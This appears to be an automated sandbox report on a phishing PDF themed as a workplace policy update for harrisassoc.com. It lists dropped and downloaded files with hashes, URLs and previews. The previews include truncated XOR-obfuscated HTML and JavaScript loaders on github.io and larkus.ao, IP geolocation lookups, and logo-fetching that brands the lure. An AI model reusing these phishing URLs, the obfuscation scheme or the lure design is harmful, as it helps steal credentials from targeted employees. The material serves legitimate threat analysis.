                                                                                    SHA-512:25562D7E49D0F8D0175A14291A1C52BB6399791F30249EF75878E5BB4877959B572CE6004728D8A2F1A678BACEF70378CE8F35F3875592CEE8766D9614A7891D
                                                                                    Malicious:false
                                                                                    URL:https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/
                                                                                    Preview:<!DOCTYPE html>.<html>.<head>. <title>Obfuscated HTML</title>.</head>.<body>. <script>. var key = "secretkey";. var encodedHtml = "T0QnPSYgMjU8Uw0XHwlKYVkRBwgPUgkVBQJEUQANUFt+Vw0cEgFdeEVUS0VFHgAXE0UXAwQLAAAXT0chPyNUS0ddeEVUS0VFHgAXE0UaCggcTkcVGwADGwoLB0dDEQoaHwAXB1hBBQwQHw1EFwAVGwYRRhIQFxELXkUdBQwNGgQPXxYXCgkcTlRNQkdKYUVZU0VfBgwABwBHOgYGUigVBVlWBwwXHgBKYUVZU0VfHgwaAEULFgleUBYAEgkcAA0GFxFWSw0LFgNeUA0AHxUKSUpMEQEaARZXEAkMBwESBwQLFksAHQhbCg8YC0oPGwcHRAMWHRFOExIRGAoUFkpVXFVaW0oaABZMEwkYRQgQHUsAARZWVW9ZU0VDTgkdBQ5ZAQAPT0cHHxwVFhYLFwAASUURAQAFT0cHHxwVFksAARZWVW9FXA0GEwFKYVkbHAEaTG9US0VZTwEKBEUXBwQKAFhBBAAGAgMQEAQXGwoaRgYWHRECGwsRGUdHeUVDUkVUS0VZTwEKBEUXBwQKAFhBBAAGAgMQEAQXGwoaRgYYAQFBTG9US0VZU0VDUkVUS0VFFwwVUgYYChYKTkcPHQIbRgYWHRECGwsRGUdHeUVDUkVUS0VZU0VDUkVUS0VFGggEUhYGCFhbGggCFQBbBwoeHEsTHAJWSwYVEhYQT0cYBAIWUwkMEwEdBQJbUwQPBlhWJwoeHEdDHQsYBAQdTkcXGgwHRQYVEhYQPgwHH0sLFhUPEwYRQ0IVHAQHGwsTTElZVAkMEwERD0JQUVtpUkVUS0VZU0VDUkVUV0odGhNdeG9US0VZU0VDUkVUS0VFFwwVUgYYChYKTkcVFxcdD
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:PNG image data, 200 x 200, 8-bit/color RGB, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):15337
                                                                                    Entropy (8bit):7.9673222486671005
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:HVEQJe1Nw/Oo9I+WV/OpRRoSp/pm03N4DFZx+T3zoJ:en1+Oo9SVmRY0d45r63+
                                                                                    MD5:8CFD3BF1D45EC0DA4468D2C4974E6625
                                                                                    SHA1:1D6EB7D2FC42093541C3EB94F78D5C2CF8284B65
                                                                                    SHA-256:9A785A2DE03D045A0CE4856286D7F971357136FF29C4913329FAD9803F05CFC8
                                                                                    SHA-512:67D119020D4561C3FD1982073A0045800DBB3B3FF8A1AB9F828F50567AC3905F0169A02E14667AED76C58ADA100718446AF128C8B43790AAA764A16F3E39F97F
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR.............":9...;.IDATx...X.W.7^..B7..( .(..F.L.[H4*..$..1.;j..h....1.Y.,z3.h....1&... .....,...V.....u..M......yf..=y:Mw..sN..{..(bY.......?...........X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^........a.O....(.>dY...x<.......t........0..C.v..........!.H..p..$I.,.$)....~FQ.|.r..5.%..a.0...b...).".H(...t.\ ..B!.d.j$..|,..e.k.y..B....?.S.. .n7,VX.\.4-....p8.B.........a.b1I.......x<HBc..B...$..kHJ!1&..%....|..=...v.4.....v...=.gE..e0..F....L&s:.&.) @.T.F.r.D".M....R......r..f.V.R.@;q.."...=..+.|.....777O.8....bt........q.YQQQc.=..|UU...R.P(4.../_^.t.!C......[YY).....]D ..,{....J.........e.n..f..O.Rill..fc..{".N..eY....?N.D...kkkY..i......q..4M..7N".<|...r..;.......D..h\.....B..u......b
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:PNG image data, 200 x 200, 8-bit/color RGB, non-interlaced
                                                                                    Category:downloaded
                                                                                    Size (bytes):15337
                                                                                    Entropy (8bit):7.9673222486671005
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:HVEQJe1Nw/Oo9I+WV/OpRRoSp/pm03N4DFZx+T3zoJ:en1+Oo9SVmRY0d45r63+
                                                                                    MD5:8CFD3BF1D45EC0DA4468D2C4974E6625
                                                                                    SHA1:1D6EB7D2FC42093541C3EB94F78D5C2CF8284B65
                                                                                    SHA-256:9A785A2DE03D045A0CE4856286D7F971357136FF29C4913329FAD9803F05CFC8
                                                                                    SHA-512:67D119020D4561C3FD1982073A0045800DBB3B3FF8A1AB9F828F50567AC3905F0169A02E14667AED76C58ADA100718446AF128C8B43790AAA764A16F3E39F97F
                                                                                    Malicious:false
                                                                                    URL:https://logo.clearbit.com/harrisassoc.com?size=400
                                                                                    Preview:.PNG........IHDR.............":9...;.IDATx...X.W.7^..B7..( .(..F.L.[H4*..$..1.;j..h....1.Y.,z3.h....1&... .....,...V.....u..M......yf..=y:Mw..sN..{..(bY.......?...........X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^.....0.0x.&../......X.......`ba..L,.^........a.O....(.>dY...x<.......t........0..C.v..........!.H..p..$I.,.$)....~FQ.|.r..5.%..a.0...b...).".H(...t.\ ..B!.d.j$..|,..e.k.y..B....?.S.. .n7,VX.\.4-....p8.B.........a.b1I.......x<HBc..B...$..kHJ!1&..%....|..=...v.4.....v...=.gE..e0..F....L&s:.&.) @.T.F.r.D".M....R......r..f.V.R.@;q.."...=..+.|.....777O.8....bt........q.YQQQc.=..|UU...R.P(4.../_^.t.!C......[YY).....]D ..,{....J.........e.n..f..O.Rill..fc..{".N..eY....?N.D...kkkY..i......q..4M..7N".<|...r..;.......D..h\.....B..u......b
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:JSON data
                                                                                    Category:downloaded
                                                                                    Size (bytes):764
                                                                                    Entropy (8bit):4.74727172577332
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:f8WJMHx14yOu/hz/zHoaNOU4/c/UddFB6MrYJmV4Mr2iWxmrp2AptAv9VVZ8BHA:k1x14wxHoaNO38mV5r2Zmrp2sAv9OBHA
                                                                                    MD5:AF7363CA84DC1C09C5ABB69DDA664EEA
                                                                                    SHA1:1B1497B9DB7EEFB594E45BF4165C75F05AE64E12
                                                                                    SHA-256:3CE5BCA513C0D0115CDEF2D28CB59EC98E1CD70A33C4CC839B60366EA28C7CA6
                                                                                    SHA-512:1828ACE2F7A24846755CEDE958555C58D35B8797790BFE4F6A2C181D5FF751B408F891524298688C2404D9554D2194A9F493616A5CF8F7CDD68CA99EF8663A1A
                                                                                    Malicious:false
                                                                                    URL:https://ipapi.co/json/
                                                                                    Preview:{. "ip": "8.46.123.189",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0500",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 126828, version 768.256
                                                                                    Category:downloaded
                                                                                    Size (bytes):126828
                                                                                    Entropy (8bit):7.995551491026822
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:caEaIjBfXHk79vCMuMZhQqmiutWxJfU52qiAx+SMfd:caEaIf3kxa5aaVMaHAScd
                                                                                    MD5:297973A488F688271DD223D542BA2697
                                                                                    SHA1:ED99D812E4C88826335F93ACEDE3FAD85C90FB54
                                                                                    SHA-256:1B099F88C06ED0869872561C157F0EC9CBE133A0939D9ECE4EE1E1F54BD4683D
                                                                                    SHA-512:83C802972D9FEE9DD7E3C0DE42D8636C504E65FF20E43406BB446CC95A16ACAA21789A03F0E2006148ABFE47100BBD0C66AA4CF98F11E9B0220F1DCDB5204F46
                                                                                    Malicious:false
                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2
                                                                                    Preview:wOF2.......l......fP...!.........................8.$. .`..$...h..0.(..p. .'3...@X....v{."*.=<D....@UUUU3..;T5.....~._..7........?.....?....|....o...?~..{_|0.....f....j.$5.....Di,...\.H...&)0......o......LA...{.;./.T<.5w.6.Z...n..@.e.'..7.......... ..jD.......D..H..=a.....xx....2.....@2;..H }..\...O.....C..}I;5S.......s.....z.....;.h...R.........p...e.<Y9..Uuo...r.\.U.z:Mw......Q..R....B..Q6.A...ZB|6.....8.S\..m?'F.8.3..........,.}u.tW...........va.'..........I............Av.,.....F#..<w.W..R..s....P.WwW.PwO.H...,Y..e.=.8F..;....%%...{B..Y...L....F...^...y.om.......|v.3.......IQQGE..uvEEE...m......uV....].Q...EI./LJ,**2...FE....f..........Z+_O..~.f..e..R';K=5..B.<...qQa!.....};.......x.Q.~....1......B..!+.3.XU.jz.!....&.W...#.....J#.H..k......-.kN.,...Y.6z,."E..f....9...........Ddb...AD&.....d...(2.J.#..R.....@....mD&..L.kU$.A.(. .V._...v_]....(~V-.Tu.*G}S...U.....z.s.&...ci%.........cZ...u.C........y...C..5qS.X`..4.....]E,..L|.
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:JSON data
                                                                                    Category:downloaded
                                                                                    Size (bytes):21
                                                                                    Entropy (8bit):3.594465636961452
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                                                                    MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                                                    SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                                                    SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                                                    SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                                                    Malicious:false
                                                                                    URL:https://api.ipify.org/?format=json
                                                                                    Preview:{"ip":"8.46.123.189"}
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):764
                                                                                    Entropy (8bit):4.74727172577332
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:f8WJMHx14yOu/hz/zHoaNOU4/c/UddFB6MrYJmV4Mr2iWxmrp2AptAv9VVZ8BHA:k1x14wxHoaNO38mV5r2Zmrp2sAv9OBHA
                                                                                    MD5:AF7363CA84DC1C09C5ABB69DDA664EEA
                                                                                    SHA1:1B1497B9DB7EEFB594E45BF4165C75F05AE64E12
                                                                                    SHA-256:3CE5BCA513C0D0115CDEF2D28CB59EC98E1CD70A33C4CC839B60366EA28C7CA6
                                                                                    SHA-512:1828ACE2F7A24846755CEDE958555C58D35B8797790BFE4F6A2C181D5FF751B408F891524298688C2404D9554D2194A9F493616A5CF8F7CDD68CA99EF8663A1A
                                                                                    Malicious:false
                                                                                    Preview:{. "ip": "8.46.123.189",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0500",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):1057
                                                                                    Entropy (8bit):7.6851406288304105
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Qb0EcwtZDFHs70yTIy9pEq0WVBtXVMDug3iLRciNe47zz:QIEFA7pdl3tFEWRRPz
                                                                                    MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                                                                                    SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                                                                                    SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                                                                                    SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR...l.................pHYs...........~.....IDATh..XMN.P..\.E......' ,.-.$'.H....s...1.vQ.......4.........-.<......{..|.?.w[4....A.=h<>.......7..t.u..]A{..&...,..h.`D4.01]......H.&..C.w...@....*..a..3..H.aR.=.g.(.0.6...;Wl...X.X..G.Bf.....D4...K..p... ..hh.-b.R.Z....Z..zYQc}....u^..R.Dzm$..%c".....C.*z.\&U9P..0.3s*..31..@...W..2....yG.....c)k.F....3.I!....2..F.....`%1.....-..U.s(.p..S.($/...}(.5.\"k.+.I.Q...cb....kt..o.`.........%L....;.J.[..b.xx)c,X7.....)..'.n..H=E<.B.].g.}f.o...........znJ.....Q$....7...#.&..g.D..X....F..~=...%IQ.........e.....>.R..............s..[.D|l.n&..a06..d.5.5YGC..3N......<..Pt..\<{b...i.....)!.....8...0.t_.....8..T.......)G.-mzK....../..TDK..k..s"ch.0....i..`...`V..H.Q"...x......!.."..Q..%3O.L.....$....e.s.m..||.......AD."...#.%b,'..r!.}c...X!2kCD6..iX.\@S..3Er....B...D...%.O...(._...-....{b......z........r.N..W2....L.1~-.J.?.l....?..q:..W.5&.....|..>.B...G.oa.S.....1......Zo...q.....
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:HTML document, ASCII text, with very long lines (3909)
                                                                                    Category:downloaded
                                                                                    Size (bytes):9115
                                                                                    Entropy (8bit):6.0587900718391925
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Ywnb1iC9OA9XXMa9kukrALQDUnulGVopLAGCALQD6vnglET31iCLL3d:7B8H3DUulGmmv3D6vglETliCfN
                                                                                    MD5:1EB970CE5A18BEC7165F016DF8238566
                                                                                    SHA1:9EFD1514AF80FE14DB4ED28E9BC53975B9EE089C
                                                                                    SHA-256:70D613E3ACFBA24FD2876FCBACAF639E1E111EF4D54BAF70761C47673F37D6A3
                                                                                    SHA-512:21B4D800CC282CA452F7394E95D5382340AC3481A002C21DA681005A44F18EA6CF43959990CD715B4657F180E0E96D6087FE724F3200E909F9FD70EBCD5511BD
                                                                                    Malicious:false
                                                                                    URL:https://roadmap27.github.io/favicon.ico
                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'">. <title>Site not found &middot; GitHub Pages</title>. <style type="text/css" media="screen">. body {. background-color: #f1f1f1;. margin: 0;. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;. }.. .container { margin: 50px auto 40px auto; width: 600px; text-align: center; }.. a { color: #4183c4; text-decoration: none; }. a:hover { text-decoration: underline; }.. h1 { width: 800px; position:relative; left: -100px; letter-spacing: -1px; line-height: 60px; font-size: 60px; font-weight: 100; margin: 0px 0 50px 0; text-shadow: 0 1px 0 #fff; }. p { color: rgba(0, 0, 0, 0.5); margin: 20px 0; line-height: 1.6; }.. ul { list-style: none; margin: 25px 0; padding: 0; }. li { d
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                                    Category:downloaded
                                                                                    Size (bytes):1057
                                                                                    Entropy (8bit):7.6851406288304105
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Qb0EcwtZDFHs70yTIy9pEq0WVBtXVMDug3iLRciNe47zz:QIEFA7pdl3tFEWRRPz
                                                                                    MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                                                                                    SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                                                                                    SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                                                                                    SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                                                                                    Malicious:false
                                                                                    URL:https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/image/logo.png
                                                                                    Preview:.PNG........IHDR...l.................pHYs...........~.....IDATh..XMN.P..\.E......' ,.-.$'.H....s...1.vQ.......4.........-.<......{..|.?.w[4....A.=h<>.......7..t.u..]A{..&...,..h.`D4.01]......H.&..C.w...@....*..a..3..H.aR.=.g.(.0.6...;Wl...X.X..G.Bf.....D4...K..p... ..hh.-b.R.Z....Z..zYQc}....u^..R.Dzm$..%c".....C.*z.\&U9P..0.3s*..31..@...W..2....yG.....c)k.F....3.I!....2..F.....`%1.....-..U.s(.p..S.($/...}(.5.\"k.+.I.Q...cb....kt..o.`.........%L....;.J.[..b.xx)c,X7.....)..'.n..H=E<.B.].g.}f.o...........znJ.....Q$....7...#.&..g.D..X....F..~=...%IQ.........e.....>.R..............s..[.D|l.n&..a06..d.5.5YGC..3N......<..Pt..\<{b...i.....)!.....8...0.t_.....8..T.......)G.-mzK....../..TDK..k..s"ch.0....i..`...`V..H.Q"...x......!.."..Q..%3O.L.....$....e.s.m..||.......AD."...#.%b,'..r!.}c...X!2kCD6..iX.\@S..3Er....B...D...%.O...(._...-....{b......z........r.N..W2....L.1~-.J.?.l....?..q:..W.5&.....|..>.B...G.oa.S.....1......Zo...q.....
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:ASCII text, with very long lines (65317)
                                                                                    Category:downloaded
                                                                                    Size (bytes):89220
                                                                                    Entropy (8bit):4.793594206481332
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:iUMVM6MVMkMVM9MVMNMVMispxd1zJJ29Nll3IV7UHsR+z:Dd1NY95IV7UMR+z
                                                                                    MD5:DFB8FC36E102730FDDF78B5494EB0035
                                                                                    SHA1:B513D9A39AF2EE145F12C1BA03F9982960C47029
                                                                                    SHA-256:8D321D88CB97FDEDC3189506C25DE9292C6E73A60EBAAB496243346C6404480E
                                                                                    SHA-512:F6EB006B5D0844ED078689E9C80215A63AF294FBE80F088F52229D5A4E6DDCFCA8958D5C39DE03484D066BEAE2E00B93AE83D1E5A42F5D4F710BAA8E3E7CC57A
                                                                                    Malicious:false
                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css
                                                                                    Preview:/*!. * Font Awesome Free 6.0.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2022 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.05357em
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):21
                                                                                    Entropy (8bit):3.594465636961452
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                                                                    MD5:909AD59B6307B0CD8BFE7961D4B98778
                                                                                    SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                                                                    SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                                                                    SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                                                                    Malicious:false
                                                                                    Preview:{"ip":"8.46.123.189"}
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:ASCII text
                                                                                    Category:downloaded
                                                                                    Size (bytes):4302
                                                                                    Entropy (8bit):4.8051819626117185
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:WlbczVkYQ7fiPv3DIbhEf41PJESO48mLnw+:WlbcaEPv3DIbo41PJESO48mLN
                                                                                    MD5:C4772690CE4666275F53126A0D25EF06
                                                                                    SHA1:70E2F36525485B19394E858D5AAC2E547F017DD5
                                                                                    SHA-256:7165EA4E168AA399516671A63178504323591C1DCFBE48B6CA5B6E7386711683
                                                                                    SHA-512:299EADA4C1E771A988685351A0C84F665445BDA67873A6CBF372278E1CA596BB91832375A0A5FE288DB2CD7E62516AF63884E5B03B66E9CA0FD297CFCC65D98A
                                                                                    Malicious:false
                                                                                    URL:https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/style.css
                                                                                    Preview:* {. margin: 0;. padding: 0;. box-sizing: border-box;.}..body {. font-family: 'Segoe UI', Arial, sans-serif;. background-color: #f5f5f5;. line-height: 1.6;. min-height: 100vh;.}...verification-container {. min-height: 100vh;. display: flex;. align-items: center;. justify-content: center;. padding: 1rem;.}...verification-card {. background: white;. border-radius: 8px;. box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);. width: 100%;. max-width: 400px;. overflow: hidden;.}../* Enhanced Logo Styles */..logo-container {. text-align: center;. padding: 1.5rem;. border-bottom: 1px solid #eee;. height: 120px;. display: flex;. align-items: center;. justify-content: center;.}...logo {. height: 40px;. width: auto;. max-width: 160px;. object-fit: contain;. transition: opacity 0.3s ease;.}...logo[src*="logo.clearbit.com"] {. height: 100px;. max-width: 300px;. min-height: 80px;.}...logo[src*="google.com/s2/fav
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:ASCII text, with very long lines (12627)
                                                                                    Category:dropped
                                                                                    Size (bytes):12802
                                                                                    Entropy (8bit):5.124082495154799
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:rLo1MweElGP5rwdKxg+nuGN1emmowytwcgLapwIUgspnm8dXeluEk:rk1MwefMHpGNt+LewIspnmC9H
                                                                                    MD5:FA00B18FCDB281E9F58EDCD085E4F2BF
                                                                                    SHA1:22DCE8FAA541BC0C96A488C0B31866D6A99E6EBC
                                                                                    SHA-256:867B4F2FF19FA0020AA24835BC5320FBFC787E689D56E16FEAA6F788D6719F97
                                                                                    SHA-512:AB2DDD75D8CA6CB2267BEBBC83FD78D6558F969353D481128096E27260DD10A9B9A136168C680075271B27BB052DDFB895BC0CF09E7D4CF13E4C20572914521F
                                                                                    Malicious:false
                                                                                    Preview:var key = "secretkey";.var encodedScript = "FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0VDUgkRH0UYBhEMFRcVCQccFyAOEwwYS1hZVEJYeEVUS0UaHAsQBkUdGCgWEQwPF0VJS0oQIw0MHAAIAjUYFxkKIgoQFyQXFxcMGwFbAksNFhYXWgsVHQweEhEMAEsBGAALMgIGHBFdUG9zU0VDUkpbSyIcB0UGHwQdB0UfAQoOUjAmJ0UREhYLUhIdHw1ZABERGwYASxMYHwwHExEdBAtzU0VDUgMBBQYNGgoNUgIRHyAUEgwPNBcbBjArP01KUh5+S0VZU0VDUkUXBAsKB0ULExYcS1hZBAwNFgoDRQkWEAQXGwoaRQ0YAA1NARAWGBELGgsEWlRdUG9ZU0VDUkVUSwwfU01CGgQHA0xZCG9DUkVUS0VZU0VDUkUDAgsdHBJNHgoXChEQHAtNGhcRDUVEU0ICEAoBH18bHwQNGUJPYUVZU0VDUkVUS0VZUxcGBhAGBUVeVF5pUkVUS0VZU0UeeEVUS0VZU0VDBhcNSx5zU0VDUkVUS0VZU0VDEQoaGBFZFwAAHQERDyAUEgwPUlhUChEWEU0LExYcQl5zU0VDUkVUS0VZU0VDXUpUIgNZFwAAHQERSwMYGgkQUgoGSwsWUxURHRURGUUcHgQKHklUGQAdGhcGERF+S0VZU0VDUkVUS0VZGgNDWkQQDgYWFwAHNwgVAglZDxlDUwERCAodFgEmHwQdB0sQHQYPBwERGE1eM0JKW0UPYUVZU0VDUkVUS0VZU0VDUkUDAgsdHBJNHgoXChEQHAtNGhcRDUVEU0ICEAoBH18bHwQNGUJPYUVZU0VDUkVUS0VZU0VDUkUGDhEMAQtDVUJPYUVZU0VDUkVUS0VZUxhpUkVUS0VZU0VDUkVUGQANBhcNUgERCAodFgEmHwQd
                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    File Type:ASCII text, with very long lines (12627)
                                                                                    Category:downloaded
                                                                                    Size (bytes):12802
                                                                                    Entropy (8bit):5.124082495154799
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:rLo1MweElGP5rwdKxg+nuGN1emmowytwcgLapwIUgspnm8dXeluEk:rk1MwefMHpGNt+LewIspnmC9H
                                                                                    MD5:FA00B18FCDB281E9F58EDCD085E4F2BF
                                                                                    SHA1:22DCE8FAA541BC0C96A488C0B31866D6A99E6EBC
                                                                                    SHA-256:867B4F2FF19FA0020AA24835BC5320FBFC787E689D56E16FEAA6F788D6719F97
                                                                                    SHA-512:AB2DDD75D8CA6CB2267BEBBC83FD78D6558F969353D481128096E27260DD10A9B9A136168C680075271B27BB052DDFB895BC0CF09E7D4CF13E4C20572914521F
                                                                                    Malicious:false
                                                                                    URL:https://www.larkus.ao/animal/script.js
                                                                                    Preview:var key = "secretkey";.var encodedScript = "FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0VDUgkRH0UYBhEMFRcVCQccFyAOEwwYS1hZVEJYeEVUS0UaHAsQBkUdGCgWEQwPF0VJS0oQIw0MHAAIAjUYFxkKIgoQFyQXFxcMGwFbAksNFhYXWgsVHQweEhEMAEsBGAALMgIGHBFdUG9zU0VDUkpbSyIcB0UGHwQdB0UfAQoOUjAmJ0UREhYLUhIdHw1ZABERGwYASxMYHwwHExEdBAtzU0VDUgMBBQYNGgoNUgIRHyAUEgwPNBcbBjArP01KUh5+S0VZU0VDUkUXBAsKB0ULExYcS1hZBAwNFgoDRQkWEAQXGwoaRQ0YAA1NARAWGBELGgsEWlRdUG9ZU0VDUkVUSwwfU01CGgQHA0xZCG9DUkVUS0VZU0VDUkUDAgsdHBJNHgoXChEQHAtNGhcRDUVEU0ICEAoBH18bHwQNGUJPYUVZU0VDUkVUS0VZUxcGBhAGBUVeVF5pUkVUS0VZU0UeeEVUS0VZU0VDBhcNSx5zU0VDUkVUS0VZU0VDEQoaGBFZFwAAHQERDyAUEgwPUlhUChEWEU0LExYcQl5zU0VDUkVUS0VZU0VDXUpUIgNZFwAAHQERSwMYGgkQUgoGSwsWUxURHRURGUUcHgQKHklUGQAdGhcGERF+S0VZU0VDUkVUS0VZGgNDWkQQDgYWFwAHNwgVAglZDxlDUwERCAodFgEmHwQdB0sQHQYPBwERGE1eM0JKW0UPYUVZU0VDUkVUS0VZU0VDUkUDAgsdHBJNHgoXChEQHAtNGhcRDUVEU0ICEAoBH18bHwQNGUJPYUVZU0VDUkVUS0VZU0VDUkUGDhEMAQtDVUJPYUVZU0VDUkVUS0VZUxhpUkVUS0VZU0VDUkVUGQANBhcNUgERCAodFgEmHwQd
                                                                                    File type:PDF document, version 1.3, 1 pages
                                                                                    Entropy (8bit):7.414186356365274
                                                                                    TrID:
                                                                                    • Adobe Portable Document Format (5005/1) 100.00%
                                                                                    File name:Harrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdf
                                                                                    File size:412'479 bytes
                                                                                    MD5:282f1598a8f06e4bc477e8aabfa9d1d8
